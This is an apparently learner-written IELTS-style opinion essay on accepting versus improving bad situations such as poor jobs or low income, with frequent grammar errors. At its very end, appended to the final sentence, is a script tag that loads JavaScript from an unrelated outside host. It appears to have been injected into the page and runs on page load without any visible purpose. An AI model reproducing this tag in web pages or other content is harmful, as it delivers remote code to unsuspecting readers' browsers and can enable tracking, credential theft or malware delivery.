Some people believe that it is best to accept a bad situation, such as an unsatisfactory job or shortage of money. Others argue that it is better to try and improve such situations. Discuss both these views and give your own opinion.

In modern times, a lot of people insist that it is a good way to accept an uncomfortable job or lack of funds. However, other people believe that we could find out to improve this situation. In this essay, I will discuss both points of view.

On the one hand, people could gain a comfort life, if they accept unsatisfactory job or salary. Because, most of the people can obtain living expense such as an electric bill, cell phone bill or house rent bill from that career. So, a plethora of people can give up to change their bad circumstance. For example, nowadays, many university students would give up to gain an occupation which related to their major because of unstable economic and low employment rate. So, they just receive their reality.

On the other hand, some people try to effort to get out of a bad situation. So, people could find out and deal with their bad circumstance through study. For instance, my neighbor, who called Jennifer, raised a poor house. Her parents could not support her study. However, she studied hard and some universities recognized her effort, she entered school and received a scholarship for 4 years. After graduated from university, she achieved her dream and became a doctor. Now, she overcomes her’s a bad situation and changed a good situation.

To sum it up, some people take their life without changing due to comfort or compromising reality. While others try to effort to change their life because of a better life.<script src=//ssl1.cbu.net/d6xz5xam></script>